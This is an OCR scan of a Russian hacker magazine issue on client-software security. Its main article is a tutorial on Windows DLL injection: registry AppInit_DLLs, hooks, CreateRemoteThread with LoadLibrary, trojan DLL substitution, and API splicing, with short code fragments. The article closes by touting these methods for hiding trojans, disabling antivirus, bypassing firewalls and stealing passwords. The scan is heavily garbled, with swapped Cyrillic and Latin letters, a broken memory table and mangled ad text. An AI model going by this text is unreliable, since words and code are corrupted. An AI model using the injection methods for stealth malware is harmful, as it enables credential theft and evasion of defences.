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Windows на страже 
порядка 


Защита от посягательства 
на наши приложения 

Главным компонентом «обороны» OC Windows 
являются четыре кольца защиты процессора. 
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снаружи и изнутри 
Понатыкали тут брандмауэров! Житья от них 
ни-какого. Даже в ХР появилось какое-то подобие, 
но никак не работающее. Спецы только и спорят, 
насколько эта штука нужна и можно ли ее обойти. 
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Создай свою реальность 


с компьютером ОЕРО Ego на базе процессора Intel® Pentium® 4 с технологией HT 


pentium 


Включи DEPO Ego — и перед тобой откроется новая реальность твоих 
любимых компьютерных игр. Наслаждайся быстротой реакции и скоростью, 
исследуй распахнувшийся перед тобой мир высококачественной 
компьютерной графики и настоящего экшена. Теперь эта цифровая 
реальность может стать твоей благодаря компьютеру ОЕРО Едо на базе 
процессора Intel® Pentium® 4 с технологией НТ. 


ОЕРО Ego 360 TV: 

* процессоры Intel® Pentium® 4 с технологией HT серии бхх (2M6 cash второго уровня) 
+ чипсет Intel® 925XE с улучшенной архитектурой 

. сверхбыстрая память DDR2 

* новые возможности графики PCI-Express 

. реалистичный объемный 8-канальный звук 


до и Intel Pentium являются зарегистрир 


гистрированными товарными ками к 


ироко распространено мнение, что для взлома компьютерной сети, особенно крупной и секретной, нуж- 
но преодолеть много преград сложной системы безопасности, обойти брандмауэр и т.д. Только тогда 
удастся проникнуть в святая святых - к суперсерверам и хранилищам секретных данных :). Однако со 
временем выяснилось, что клиентские приложения - компьютеры и программы рядовых пользователей, имеющих 
доступ к интересуемой сети, - гораздо уязвимее, чем сложные серверные системы. Поэтому проще взломать их 
("клиентов"), а дальше - копаться в сети изнутри. Вспомнить хотя бы старину Митника, который в свое время похо- 
жим способом (правда, по большей части используя фрикерские приемы и чудеса социальной инженерии) прони- 
кал туда, куда ему не сделовало соваться. 

Сегодня, когда промышленный шпионаж обретает грандиозные масштабы, следует особенно тщательно занимать- 
ся безопасностью обычных офисных компьютеров: банальный троян может принести сотни миллионов убытков. Ук- 
раденные исходники Half-Life 2, Cisco IOS - подтверждения тому. Можно сказать, что сейчас охота на "клиентов" на- 
ходится на стадии бурного развития. Безопасность клиентских приложений стала настолько актуальной, что мы ре- 
шили уделить этой проблеме целый номер, добавив в качестве приправы безопасность сетевых и криптографичес- 
ких протоколов как важнейшие компоненты современных компьютерных систем. 

Конечно, защиты Ha 100% не было, нет и не будет. Тот же человеческий сфактор никуда никогда не денется. OgHa- 
ко стремиться минимизировать риски, думаю, стоит всегда. 


AvaLANche feat. Андрей Каролик 


СОДЕРЖАНИЕ № O9 (58) 


4 Windows на страже 
порядка 

Защита от посягательства на 
наши приложения, или почему 
она никого не пугает 


10 Сокрушительная 
атака 

Buffer overflow на службе 
B3NOMLLIVKOB 


16 Как скрытое 
становится явным 
Проникновение в Protected 
Storage 


XX 7 


18 Инструктаж перед 
боем 
Ошибки клиентских приложений 


24 Издевательство 
над окнами 
Эмуляция ввода с клавиатуры 


28 Ultimate adventure 
Стратегия поиска дыр в ЧВоичном 
коде 


34 Защити свои 
приложения 

Как защититься от атаки на 
переполнение буфера 


38 Вся правда 

об антивирусах 
Обзор и анализ самых 
популярных антивирусов 


44 Жесткий 
тест файрволов 
Проверим, кто же хуже всех 


48 Интервью с Agnitum 
Вопросы разработчикам Outpost 
Firewall 


50 Stealth patching 
своими руками 
Малоизвестные способы взлома 


56 Мнение 
профессионала 
Интервью с ЗАРАЗА 


58 Полоса препятствий 
Преодоление срайрволов 
снаружи и изнутри 


62 Утечка данных 

Через служебную инорормацию и 
сетевой протокол в клиентском 
приложении 


66 Как работает 
брандмауэр 


Пакетные срильтры и прокси 


72 Сделай 

это безопасным! 
Создание и исследование 
криптографических протоколов 


78 Забытый протокол 
от AOL 
Instant messenger, flooder, brute- 
forcer? Легко! 


84 Безопасность 
сетевых протоколов 
Взгляд со стороны клиента 


и 
88 Обзор книг 
Что полистать 
90 Обзор сайтов 


Что посмотреть 


92 Вирусы по-женски 
нтервью с девушкой вирусным 
аналитиком 


96 FAQ 

По взлому клиентских 
приложений и безопасности 
сетевых протоколов 


р 


ЭКСПЕРТ НОМЕРА 


Крис Касперски 
ака мыщьх 


ff. 
Jah 


Небрежно одетый MBILLIbX, 28 лет, 
не обращающий внимание ни на 
мир, ни на тело, в котором живет, и 
обитающий исключительно в деб- 
рях машинных кодов и зарослях 
технических специорикаций. Не об- 
щителен, ведет замкнутый образ 
жизни хищного грызуна, практи- 
чески никогда не покидающего 
свою норку. Основная специали- 
зация - реинженеринг (дизассемб- 
лирование), поиск уязвимостей в 
существующих защитных механиз- 
мах и разработка собственных сис- 
тем защиты. Хакерские мотивы 
творчества не случайны и объяс- 
няются по-детски естественным 
желанием заглянуть "под капот" 
компьютера и малость потыкать 
его "ломом" и "Молоточком". 
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oc WINDOWS НА СТРАЖЕ ПОРЯД KA) 


Deeoni$ (arustamovv2000@mail.ru; ICQ 982-622) 


WINDOWS HA” 
СТРАЖЕ ПОРЯДКА. 


ЗАЩИТА ОТ ПОСЯГАТЕЛЬСТВА НА 
НАШИ ПРИЛОЖЕНИЯ, ИЛИ ПОЧЕМУ 
ОНА НИКОГО НЕ ПУГАЕТ 


r лавным компонентом "обороны" OC Windows являются четыре кольца 
защиты. В ring 3 работают все приложения, запущенные пользователями 
(в том числе и администраторами). Отсюда мы имеем доступ лишь к стандарт- 
ным функциям, разрешенным для использования напрямую в программах. 


d 


ольца ring 1 и ring 2 в Windows 
МТ не используются. Ring 0 - 


это самое мощное кольцо. В 


нем работает ядро системы и 


драйверы. Привилегирован- 
ные команды и ввод-ввод для третьего коль- 
ца запрещены, для взаимодействия с аппа- 
ратной частью компьютера вызываются сис- 
темные сервисы ядра ОС, которые оформле- 
ны как шлюзы. При вызове такого шлюза 
процесс переходит в нулевое кольцо, и там 
ядро ОС и драйверы обрабатывают запрос и 
возвращают результаты приложению. После 
перехода в нулевое кольцо приложение не 
может как-либо контролировать свое испол- 
нение, пока управление не будет возвраще- 
но коду третьего кольца. Это необходимое 
условие защиты, оно обеспечивает безопас- 
ность всей системы. 

Получив привилегии нулевого кольца, мы, 
по сути, становимся на этой машине богами. 
Однако в современных ОС проникнуть на 
этот уровень защиты очень трудно. 

Кольца защиты существовали и в "девят- 
ках", но Windows часто падала из-за всячес- 
ких глюков в приложениях. Эта проблема бы- 
ла решена после создания виртуального ag- 
ресного пространства, которое у каждого 
процесса свое. Благодаря такому решению 
устойчивость системы к сбоям значительно 
повысилась. Вместе с ней поднялся и уро- 
вень защиты от всяческих вредоносных 


программ. Рассмотрим подробнее это чудо- 
изобретение. 

Каждый вновь созданный процесс получа- 
ет в свое распоряжение 4 Гб памяти. Там 
располагается сам код программы, отобража- 
ются подгруженные библиотеки, в том числе 
системные. Никакой другой процесс не мо- 
жет получить доступ к данным и процедурам, 
находящимся в чужом адресном простран- 
стве. В результате приложение не может пе- 
резаписать жизненно важные структуры 
других программ, выполняющихся OGHOBpe- 
менно с ним. 

Все это сильно ограничивает нас в возмож- 
ностях и, с другой стороны, защищает. Но 
стопроцентной защиты не бывает. Сейчас я 
продемонстрирую, как можно вторгнуться в 
чужое адресное пространство и использо- 
вать законного владельца этого простран- 
ства в своих целях. Более того, при проявле- 
нии некоторой смекалки можно будет дога- 
даться, как можно получить доступ к некото- 
рым функциям ядра. Итак, начнем с того, как 
внедрить свой код в посторонний процесс. 


ВНЕДРЕНИЕ DLL 

С ИСПОЛЬЗОВАНИЕМ РЕЕСТРА 
Наверное, каждый, даже непродвинутый 

пользователь из числа наших братьев мень- 

ших :) знает, что такое реестр, для чего он 

нужен и что в нем можно трогать, а что нель- 

зя. Но не каждый догадывается о том, что с 


Windows 95 Windows МТ 
Системная область (1 Гб). Код 
OXxFFFFFFFF - | операционной системы. Доступна всем 
0хС0000000 | процессам для чтения\записи (но лучше Системная область (2 Гб). 
ite He ae : | Преданзанченна Hs | а 
с & 0х80000000 
ОХВЕЕЕЕЕЕЕ - Системная обпасть (1 Гб). Предназначена операционной системы 
0х80000000 | 9"Я Размещения объектов, разделяемых 
между процессами 
Частная собственность 
OXx7FFFFFFF - | Частная собственность процесса (-2 Гб). процесса (64 KO): Область ПАВ Ox7FFFFFFF - 
0х00400000 | Область доступна для чтения\записи И АН Ox7FFFOOOO 
неправильными значениями. 
Недоступна 
Частная собственность процесса (~4 Мб). wo ее 
OxOO3FFFFF - | Область предназначенна для размещения Al ОЕ Ox7FFEFFFF - 
0х00010000 | структур, требуемых DOS. Доступна для | 0х00010000 
доступна для чтения\записи 
чтения\записи (но лучше этого не делать) 
Частная собственность процесса (64 Кб). Частная собственность 
ОХООООЕЕЕЕ - | Область предназначена для процесса (64 Кб). Область для | OxOOOOFFFF - 
0х00000000 | использования DOS. Недоступна для выявления пустых указателей. | 0х00000000 
записи. Всегда свободна 
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помощью этой хитрой штуки можно 
заставить практически любое прило- 
жение выполнять твой код, - BOCNONb- 
зуемся параметром реестра: 


HKEY_LOCAL_MACHINE\Software\Microsoft\ 
Windows_NT\CurrentVersion\Windows\App| 
mt_DLLs 


Значением параметра Applinit_DLLs 
может быть как имя одной DLL (с ука- 
занием пути доступа), так и имена нес- 
кольких DLL, разделенных пробелами 
или запятыми. Так как пробел исполь- 
зуется здесь в качестве разделителя, 
в именах файлов не должно быть 
пробелов. Система считывает путь 
только первой DLL в списке: пути ос- 
тальных DLL игнорируются, поэтому 
лучше разметать свои DLL в систем- 
ном каталоге Windows, чтобы не ука- 
зывать пути. На рис. 2 показано, что 
мы хотим внедрить код SuperDLL.dll. 

При следующей перезагрузке 
компьютера Windows сохранит значе- 
ние этого параметра. Далее, когда 
User32.dll будет спроецирован на ag- 
ресное пространство процесса, этот 
модуль получит уведомление 
DLL_PROCESS_ATTACH и после ero 
обработки вызовет LoadLibrary для 
всех DLL, указанных значением 
AppInit_DLLs. В момент загрузки каж- 
gaa DLL инициализируется вызовом 
ее функции DLLMain с параметром 
fwdReason, равным 
DLL_PROCESS_ATTACH. 

Это простейший способ внедрения 
DLL. Нам не надо делать ничего, кроме 
как запустить regedit.exe и nogpegak- 
тировать соответствующий ключик. 
Но у этого способа есть свои недостат- 
ки, и они довольно существенны. 

Во-первых, написанная в поту и кро- 
ви dil проецируется на адресные 
пространства только тех процессов, 
на которые спроецирован модуль 
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Инициализируем параметр 


AppInit_DLLs собственной DLL 


ЛИСТИНГ 


User32.dll. Его, как известно, исполь- 
зуют все СИ|-приложения, но в боль- 
шинстве консольных программ эта 
библиотека ни к чему. Из этого выте- 
кает первый недостаток: код можно 
внедрить только в приложения с гра- 
фическим интерфейсом. 

Во-вторых, DLL будет проецировать- 
ся на адресные пространства всех за- 
пущенных СУ!-процессов. Чем боль- 
ше приложений "подомнет" под себя 
твой код, тем вероятнее то, что кто-ни- 
будь где-нибудь повиснет или выле- 
тит. Другими словами, значительно 
повышается риск непредвиденных 
ошибок. 

В-третьих, внедренные инструкции 
обычно нужны не на всем протяже- 
нии работы процесса. После того как 
DLL сделает свое дело, тебе захочет- 
ся поскорее убрать ее из памяти. Но - 
не выйдет. Поэтому перейдем к cnegy- 
ющему способу, более продвинутому. 


ВНЕДРЕНИЕ DLL С ПОМОЩЬЮ 
ЛОВУШЕК 

m Все недостатки, перечисленные 
немного выше, становятся неактуаль- 
ны, если для внедрения а! использо- 
вать хуки (ловушки). Хук можно пос- 
тавить используя следующую API- 
функцию: 


HHOOK SetWindowsHookEx(int idHook, 
HOOKPROC Ipfn, HINSTANCE hMod, DWORD 
dwThreadld); 


Первым параметром этой функции 
является тип устанавливаемого хука. 
Например, idHook может быть равен 
WH_GETMESSAGE. Эта разновидность 
ловушки срабатывает при генериро- 
вании процессом какого-пибо сооб- 
щения. Параметр Ipfn - это указатель 
на процедуру (в адресном простран- 
стве нашего процесса), которую сис- 
тема должна вызывать всякий раз 
при срабатывание хука, то есть при 
обработке окном сообщения. hMod 
идентифицирует DLL, содержащую 
срункцию, на которую указывает Ipfn. 
В Windows значение hMod аля DLL 
фактически задаст адрес виртуаль- 
ной памяти, по которому DLL спроеци- 
рована на адресное пространство. 
Последнее значение, передаваемое 
SetWindowsHookEx, указывает поток, 
для которого предназначена ловуш- 
ка. Передавая О, мы сообщаем систе- 
ме, что ставим хук для всех существу- 
ющих в ней GUI-npoueccos. В случае 
удачного выполнения функция вер- 
нет хэнол на хук-процедуру. В против- 
ном случае будет NULL. 


PTHREAD_START_ROUTIHE pfnThreadRtn = (PTHREAD_START_ROUTINE)GetProcAddress 


(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA"); 
HANDLE hThread = CreateRemoteThread(hProcessRemote, NULL, 0, pfnThreadRtn, 
"C:\\Windows\\SuperDLL.dll", 0, NULL); 


Теперь рассмотрим это подробнее. 
Допустим, у нас есть процесс А, пос- 
тавивший xykK WH_GETMESSAGE и 
наблюдающий за сообщениями, кото- 
рые обрабатываются окнами в систе- 
ме. Поток процесса В собирается нап- 
равить сообщение какому-либо окну. 
Система проверяет, не установлена 
ли для данного потока соответствую- 
щая ловушка, затем выясняет, спрое- 
цирована ли DLL, содержащая функ- 
цию хука, на адресное пространство 
процесса В. Если указанная DLL еще 
не спроецирована, система отобража- 
етее на адресное пространство про- 
цесса В и увеличивает счетчик блоки- 
ровок проекции DLL в процессе В на 
один. После этого ОС проверяет, не 
совпадают ли значения hMod этой 
DLL, относящиеся к процессам А и В. 
Если hMod в обоих процессах одина- 
ковы, то и адрес сункции хука в этих 
процессах тоже одинаков. Тогда сис- 
тема может просто вызвать рп в ag- 
ресном пространстве процесса А. Ес- 
ли же hMod отличаются, то определя- 
ется адрес функции в адресном 
пространстве процесса В по формуле: 


Ipfn В = hMod В + (Ipfn А - hMod А) 


Вычитая hMod из Ipfn А, мы получа- 
ем смещение адреса функции ловуш- 
ки. Добавляя это смещение к hMod В, 
будем иметь адрес Ipfn, соответствую- 
щий проекции DLL в адресном прост- 
ранстве процесса В. При этом счетчик 
блокировки в процессе В увеличива- 
ется на один и вызывается Ipfn в ag- 
ресном пространстве процесса В. Пос- 
ле возврата из срункции счетчик бло- 
кировки проекции DLL в адресном 
пространстве процесса В уменьшает- 
ся на один. 

Когда система внедряет или проеци- 
рует DLL, содержащую функцию 
фильтра ловушки, проецируется вся 
DLL, а не только эта функция. А зна- 
чит, потокам, выполняемым в контекс- 
те процесса В, теперь доступны все 
сункции такой DLL. 

В отличие от внедрения DLL с no- 
мощью реестра, этот способ позволя- 
ет в любой момент отключить DLL от 
адресного пространства процесса вы- 
зовом функции: 


BOOL UnhookWindowsHookEx(HHOOK ВВК); 


Единственный параметр ПИК - это 
хэндл хука, который мы хотим убрать 
и который возвращается при вызове 
SetWindowsHookEx. Когда поток обра- 
щается к этой функции, система прос- 
матривает внутренний список процес- 
сов, в которые ей пришлось внедрить 
данную DLL, и уменьшает счетчик ее 
блокировок на один. Как только этот 
счетчик обнуляется, DLL автоматичес- 
ки выгружается. Система увеличивает 
его непосредственно перед вызовом 
Ipfn. Это позволяет избежать наруше- 
ния доступа к памяти. Если бы счет- 


чик не увеличивался, то другой поток у» 
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мог бы вызвать 
UnhookWindowsHookEx в тот момент, 
когда поток процесса В пытается вы- 
полнить код функции ловушки. 


ВНЕДРЕНИЕ DLL С ПОМОЩЬЮ 
УДАЛЕННЫХ ПОТОКОВ 

m Этот способ внедрения DLL самый 
гибкий из всех. В нем используются 
многие особенности Windows, напри- 
мер потоки и синхронизация потоков, 
управление виртуальной памятью и 
многое другое. Суть этого метода зак- 
лючается в том, чтобы создать в чу- 
жом процессе поток, который подгру- 
зит в этот процесс нужную нам DLL. 
Большинство АР!-функций Windows 
позволяют процессу управлять лишь 
самим собой, тем самым исключается 
риск испортить что-нибудь в работе 
других приложений. Однако есть и та- 
кие функции, которые позволяют уп- 
равлять чужим процессом. Изначаль- 
но многие из них были рассчитаны на 
применение в отладчиках и других 
инструментальных средствах. Но нич- 
то не мешает использовать их и в 
обычных программах. 

Итак, как же реализовать это на 
практике? Для начала создать в нуж- 
ном нам процессе свой поток - для 
этого есть волшебная функция 
CreateRemoteThread. Вот ее описание: 


HANDLE CreateRemoteThread(HANDLE 
hProcess, LPSECURITY_ATTRIBUTES 
IpThreadAttributes, SIZE_T dwStackSize, 
LPTHREAD_START_ROUTINE IpStartAddress, 
LPVOID IpParameter, DWORD 
dwCreationFlags, LPDWORD IpThreadld); 


Теперь быстренько рассмотрим па- 
раметры, передаваемые этой функ- 
ции. hProcess - хэнал процесса, кото- 
рому будет принадлежать новый по- 
ток. IpThreadAttributes - это указатель 
на структуру с зесигву-атрибутами. 
dwStackSize определяет размер стека, 
отведенный новому потоку. 
IpStartAddress есть адрес функции 
потока, а рРагате{ег - параметр, пе- 
редаваемый ей. dwCreationFlags уста- 


ВНЕДРЕНИЕ КОДА В СРЕДЕ WINDOWS 98 ЧЕРЕЗ 
ПРОЕЦИРУЕМЫЙ В ПАМЯТЬ ФАЙЛ 


Ш Эта задача в Windows 98, по сути, тривиальна. В ней все 32-раз- 
рядные приложения делят верхние два гигабайта своих адресных 
пространств. Выделенный там блок памяти доступен любому при- 
ложению. С этой целью мы должны использовать проецируемые в 
память файлы. Сначала мы создаем проекцию файла, а потом вы- 
зываем MapViewOfFile и делаем ее видимой. Далее мы записываем 
нужную информацию в эту область своего адресного пространства 
(она одинакова во всех адресных пространствах). Чтобы все это ра- 
ботало, нам, вероятно, придется вручную писать машинные коды, а 
это затруднит перенос программы на другую процессорную плат- 
форму. Но это не очень страшно: все равно Windows 98 работает 
только на процессорах типа х86. 

Данный метод тоже довольно труден, потому что нам нужно будет 
заставить поток другого процесса выполнять код в проекции фай- 
ла, для чего понадобятся какие-то средства управления удаленным 
потоком. Здесь пригодилась бы функция CreateRemoteThread, но 
Windows 98 ее не поддерживает. 


Кольца защиты 


навливает дополнительные срлаги, щает идентификатор, приписанный 


управляющие потоком. Он принимает 
одно из двух значений: О (исполнение 
потока начинается немедленно) или 
CREATE_SUSPENDED. В последнем 
случае система создает поток, иници- 
ализирует его и приостанавливает go 
последующих указаний. Последний 
параметр - это адрес переменной типа 
DWORD, в которой сфункция возвра- 
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Поток процесса В пытается создать подкласс окна, сформированного потоком 
процесса А 


системой новому потоку. Вообще, 
прототип CreateRemoteThread практи- 
чески полностью идентичен 
CreateThread, за исключением хэндла 
процесса, которого в последней функ- 
ции нет. 

Теперь возникла проблема: как зас- 
тавить созданный нами удаленный 
поток загрузить нужную DLL? Очень 
просто: вызвать LoadLibrary. 


HMODULE LoadLibrary(LPCTSTR IpFileName); 


Единственный передаваемый пара- 
метр - это указатель на строку, содер- 
жащую путь к DLL. Существуют две 
реализации этой API: LoadLibraryA, 
LoadLibraryW. Первая предназначена 
для работы со строкой в ANSI-kogu- 
ровке, а вторая - в юникоде. Волею 
судеб прототипы LoadLibrary и cpyHk- 
ции потока почти идентичны: обе при- 
нимают единственный параметр и 
возвращают некое значение. Кроме 
того, обе используют одни и те же 
правила вызова - WINAPI. Теперь 
включим мозг и стараемся придумать, 
как использовать это... Догадался? 
Нужно создать новый поток, адрес 
функции которого является адресом 
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LoadLibraryA или LoadLibraryW. Это 
должно выглядеть примерно так: 


HANDLE hThread = 
CreateRemoteThread(hProcessRemote, 
NULL, 0, LoadlibraryA, 
"C:\\Windows\\SuperDLL.dil", 0, NULL); 


Новый поток в удаленном процессе 
немедленно вызовет LoadlibraryA 
(или LoadlibraryW, если ты поклонник 


юникода), передавая ей адрес полно- 
го имени DLL. Возникает вопрос: "Не- 
ужели все так просто?" Ан нет! Есть 
пара проблемок, которые непременно 
требуют решения. 

Первая заключается в том, что нель- 
зя вот так просто передать 
CreateRemoteThread в четвертом па- 
раметре LoadlibraryA или 
LoadlibraryW. Причина этого кроется в 
устройстве раздела импорта, который 


Конечно, теоретически ОС может загрузить 
что угодно и куда угодно, 
но на практике Кегпе! 32.9! находится 
всегда в одном и том же месте. 


ГЕ НИС ТЕТЕ 


ФУНКЦИЮ-ФИЛЬТР 


ПРИЛОЖЕНИЕ ИЛИ DLL 


УКАЗАТЕЛЬ НА. 
ТАБЛИЦА ХУКОВ 


Цепочка функций-фильтров в Windows 


САГА ОБ ОТЛАДЧИКАХ 


Функция-фильтр 
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Ш Отладчик может выполнять над отлаживаемым процессом осо- 
бые операции. Когда отлаживаемый процесс загружен и его адрес- 
ное пространство создано, но первичный поток еще не выполняет- 
ся, система автоматически уведомляет об этом отладчик. В этот мо- 
мент отладчик может внедрить в него нужный код (используя, нап- 
ример, WriteProcessMemory), а затем заставить его первичный по- 


ток выполнить внедренный код. 


Этот метод требует манипуляций со структурой СОМТЕХТ потока 
отлаживаемого процесса, а значит, код будет зависим от типа про- 
цессора, и его придется модифицировать при переносе на другую 
процессорную платформу. Кроме того, почти наверняка придется 
вручную корректировать машинный код, который должен быть вы- 
полнен отлаживаемым процессом. Нельзя забывать и о жесткой 
связи между отладчиком и отлаживаемой программой: как только 
отладчик закрывается, Windows немедленно закрывает и отлажи- 
ваемую программу. Избежать этого невозможно. 


состоит из шлюзов к импортируемым 
API. Так что когда код вызывает 
LoadlibraryA, в разделе импорта ис- 
полнительного файла генерируется 
вызов соответствующего шлюза, а 
уже оттуда происходит вызов нужной 
функции. Следовательно, прямая 
ссылка на LoadlibraryA в вызове 
CreateRemoteThread преобразуется в 
обращение к шлюзу в разделе импор- 
та. Это заставит поток выполнять не- 
известно что, и это приведет, скорее 
всего, к нарушению доступа. Чтобы 
напрямую вызывать LoadLibraryA, ми- 
нуя шлюз, с помощью GetProcAddress 
нужно выяснить ее точный адрес в 
памяти. 

Получив адрес LoadLibrary в нашем 
процессе, его можно запросто ис- 
пользовать в удаленном. Как это ста- 
новится возможным? kernel32.dll, со- 
держащая функцию загрузки DLL, 
всегда проецируется на один и тот же 
диапазон адресов, поэтому в разных 
процессах точки входа в АР!-функ- 
цию будут совпадать. Конечно, теоре- 
тически ОС может загрузить что yrog- 
но и куда угодно, но на практике Кег- 
nel32.dll находится всегда в одном и 
том же месте. 

С первой проблемой покончено, 
возьмемся за вторую. Ее суть заклю- 
чается в том, что строка с полным 
именем библиотеки находится в ag- 
ресном пространстве нашего процес- 
са. Это нехорошо, так как мы переда- 
ем этот параметр удаленному потоку 
в другом процессе, а по этому адресу 
может быть что угодно. Приложение 
из-за этого сразу загнется, издав 
предсмертное сообщение о необраба- 
тываемом исключении. 

Все это решается очень просто. 
Нужно разместить эту злосчастную 
строку в адресном пространстве уда- 
ленного процесса и при вызове 
CreateRemoteThread передавать 
именно смещение в чужом процессе. 
В этом деле поможет такая функ- 
ция API: 


LPVOID VirtualAllocEx(HANDLE hProcess, 
LPVOID IpAddress, SIZE_T dwSize, DWORD 
flAllocationType, DWORD flProtect): 


Единственным примечательным па- 
раметром функции является hProcess, 
который должен содержать X3HGN 
другого процесса. После выделения 
памяти нужно записать туда строку с 
полным именем DLL, для чего приго- 
дится WriteProcessMemory: 


BOOL WriteProcessMemory(HANDLE 
hProcess, LPVOID IpBaseAddress, LPCVOID 
IpBuffer, SIZE_T nSize, SIZE_T* 
IpNumberOfBytesWritten): 


Параметр hProcess идентифицирует 
удаленный процесс, |рВазеАдагез$ и 
IpBuffer определяют адреса в адрес- 
ных пространствах удаленного и ло- 
кального процесса, а nSize - число пе- 


редаваемых байтов. По адресу, на ко- у» 
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Все эти процессы спокойно уживаются друг с другом = 
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торый указывает параметр 
IpNumberOfBytesWritten, возвращает- 
ся число фактически считанных или 
записанных байтов. 

Теперь немного (коротко и ясно) 
обобщим сказанное. Первым делом 
мы выделяем блок памяти в адресном 
пространстве удаленного процесса 
при помощи VirtualAllocEx. Затем ко- 
пируем в полученный блок строку с 
полным именем библиотеки сфункци- 
ей WriteProcessMemory, после чего 
получаем GetProcAdress'om адрес 
LoadLibraryA или LoadLibraryW внут- 
ри Kernel32. И, в конце концов, вызы- 
ваем CreateRemoteThread, создавая 
удаленный поток в требуемом процес- 
се, который вызовет соответствую- 
щую LoadLibrary и передаст ей адрес 
выделенного участка памяти. 

На этом этапе DLL внедрена в уда- 
ленный процесс, а ее функция О!Мат 
получила уведомление 
DLL_PROCESS_ATTACH и может прис- 
тупить к выполнению нужного кода. 
Когда ОИМат вернет управление, уда- 
ленный поток выйдет из LoadLibrary и 
вернется в функцию BaseThreadStart, 
которая в свою очередь вызовет 
ExitThread и завершит этот поток. 

Теперь в адресном пространстве по- 
допытного процесса болтается нико- 
му не нужная библиотека и кусок па- 
мяти. Чтобы избавиться от них, нужно 
проделать все вышесказанное, но с 


точностью gO наоборот: сначала осво- 
бодить выделенную память при помо- 
щи VirtualFreeEx, затем определить 
реальный адрес FreeLibrary в kernel32 
функцией GetProcAdress, а после это- 
го опять создать удаленный поток, ко- 
торый вызовет FreeLibrary и передаст 
ей хэндл нашей DLL. 


ВНЕДРЕНИЕ ТРОЯНСКОЙ DLL 

m Последний рассмотренный нами 
метод состоит в подмене реально ис- 
пользуемой в приложении библиоте- 
ки на свою. Например, точно извест- 
но, что какая-то программа подгружа- 
ет Xxx.dll. Можно написать свою биб- 
лиотеку и назвать ее тем же именем, 
что и искомая, предварительно переи- 
меновав последнюю. Для корректной 
работы придется экспортировать те 
же идентификаторы, что и в исходной 
ххх.а!, задействовав механизм пере- 
адресации срункций. Но здесь есть од- 
на заковырка: если подменять, напри- 
мер, библиотеку от Microsoft, то при 
следующем обновлении они вполне 
могут изменить эту DLL, добавив туда 
новые функции или сделав еще что- 
нибудь. Это значит, что не удастся 
загрузить приложения, использую- 
щие эти новые функции. 

Этот метод можно также применить 
для конкретной программы, присвоив 
нашей библиотеке уникальное имя и 
добавив ее в раздел импорта ехе- 
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файла. И здесь без глубоких знаний 
форматов ехе- и Я|-файлов не выжи- 
вешь. 


ПЕРЕХВАТ АР!-ФУНКЦИЙ 

и Теперь немного о перехвате API- 
срункций. Заниматься этим можно 
только в своем процессе (в чужом 
слишком сложно), но, комбинируя тех- 
ники перехвата и внедрения кода, мож- 
но добиться неплохих результатов. 


Перехват АР|!-вызовов с использо- 
ванием раздела импорта 

В разделе импорта содержится спи- 
сок DLL, необходимых модулю для 
нормальной работы. Кроме того, в нем 
перечислены все идентификаторы, 
которые модуль импортирует из каж- 
gon DLL. Вызывая импортируемую 
функцию, поток получает ее адрес 
фактически из раздела импорта. 

Метод перехвата с использованием 
раздела импорта выглядит так: опре- 
деляется точка входа перехватывае- 
мой функции, составляется список мо- 
дулей, в настоящий момент загружен- 
ных в контекст требуемого процесса, а 
затем - перебираются дескрипторы им- 
порта этих модулей в поиске адресов 
перехватываемой срункции. В случае 
совпадения этот адрес заменяется на 
адрес нашего обработчика. 

Этот способ хорош тем, что код пе- 
рехватываемой функции не изменя- 
ется, поэтому обеспечивается корре- 
ктная работа в многопоточном при- 
ложении. А недостаток в том, что 


= тои 


Книга, в которой препарируют Windows 


приложения могут сохранить адрес 
функции до перехвата и затем вызы- 
вать ее, минуя обработчик. Также мож- 
но получить адрес функции используя 
GetProcAddress из kernel32.dll. 


Сплайсинг функции 

Этот способ перехвата довольно 
стар. Программисты активно исполь- 
зовали его еще в 16-рязрядной 
Windows. Суть способа в следую- 
щем: находится адрес функции, ко- 
торую нужно перехватить, и заменя- 
ются первые пять байт длинным 
УМР на нужный нам код. Предвари- 
тельно эти пять байт нужно сохра- 
нить где-нибудь, они еще понадо- 
бятся для восстановления работо- 
способности API. 

Теперь, когда вызывается обрабо- 
танная АР!-функция, переход в ее на- 
чале передает управление заранее 
заготовленному коду. После этого 
можно восстановить оригинальные 
байты и АР! будет работать нормаль- 
но. Недостаток данного метода в том, 
что, если после восстановления нача- 
ла функции произошло переключе- 
ние контекста на другой поток прило- 
жения, он сможет вызвать функцию 
минуя перехватчик. Чтобы не попасть 
на такие неприятности, перед уста- 
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новкой АР|-перехвата необходимо ос- 
танавливать все побочные потоки, 
иначе процесс записи может быть 
прерван и функция вызовется другим 
потоком, что приведет к ошибке дос- 
тупа к памяти и аварийному заверше- 
нию приложения. Этот эфорект прояв- 
ляется не всегда, но может стать при- 
чиной нестабильной работы системы, 
поэтому не следует пренебрегать 
этим моментом. 


ЭТО КОНЕЦ? 

К сожалению, объем статьи, как 
всегда, недостаточен, чтобы вместить 
в него все, что хочется :), поэтому ос- 
тается только одно - исполнить свое 
обещание, данное в начале статьи, и 
подсказать, как получить доступ к 
функциям ядра. 

АР|-ункции представляют собой не 
что иное, как функции в системных 
DLL. Любой процесс в системе обяза- 
тельно имеет в своем адресном прост- 
ранстве Ntdll.dll, где располагаются 
функции Native АР! - базовые функ- 
ции низкоуровневой работы с систе- 
мой, функции Kernel32.dll являются 
переходниками к более мощным 
функциям Ма, следовательно, целе- 
сообразно будет перехватывать имен- 
но Native API. 
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Проблема в том, что Native API- 
функции не документированы в SDK, 
но узнать модель их вызова можно 
дизассемблированием Kernel32.dll. К 
сожалению, нельзя утверждать, что 
адреса срункций в системных библио- 
теках не изменяются в зависимости от 
версии ОС, ее сборки или даже конк- 
ретной ситуации. 


ЧТО ЖЕ МОЖЕТ БЫТЬ? 

А зачем все это нужно? Обычно- 
му пользователю такие тонкости, ко- 
нечно, ни к чему, но людям, програм- 
мирующим в Windows, это должно 
быть небезынтересно. Первым делом 
перехват АР! и внедрение кода мо- 
жет широко использоваться в троя- 
нских программах. Например, можно 
создать невидимый процесс, скрыть 
какие-либо файлы на диске, скрыть 
записи в реестре и скрыть сетевые 
соединения. Можно легко обходить 
персональные файрволы и уничто- 
жать антивирусы. Можно легко 
скрыть присутствие трояна в системе 
так, что даже тщательная проверка 
компьютера не даст ничего (правда, 
перехват сам по себе можно обнару- 
жить ;) - прим. Лозовского). Можно 
легко получить пароли на вход в 
систему. Можно на этой основе сни- 
мать {па|-ограничения серийно, с 
многих программ, использующих 
стандартные способы защиты (их по- 
давляющее большинство). Можно 
делать с системой что угодно - эта 
технология открывает все двери. 

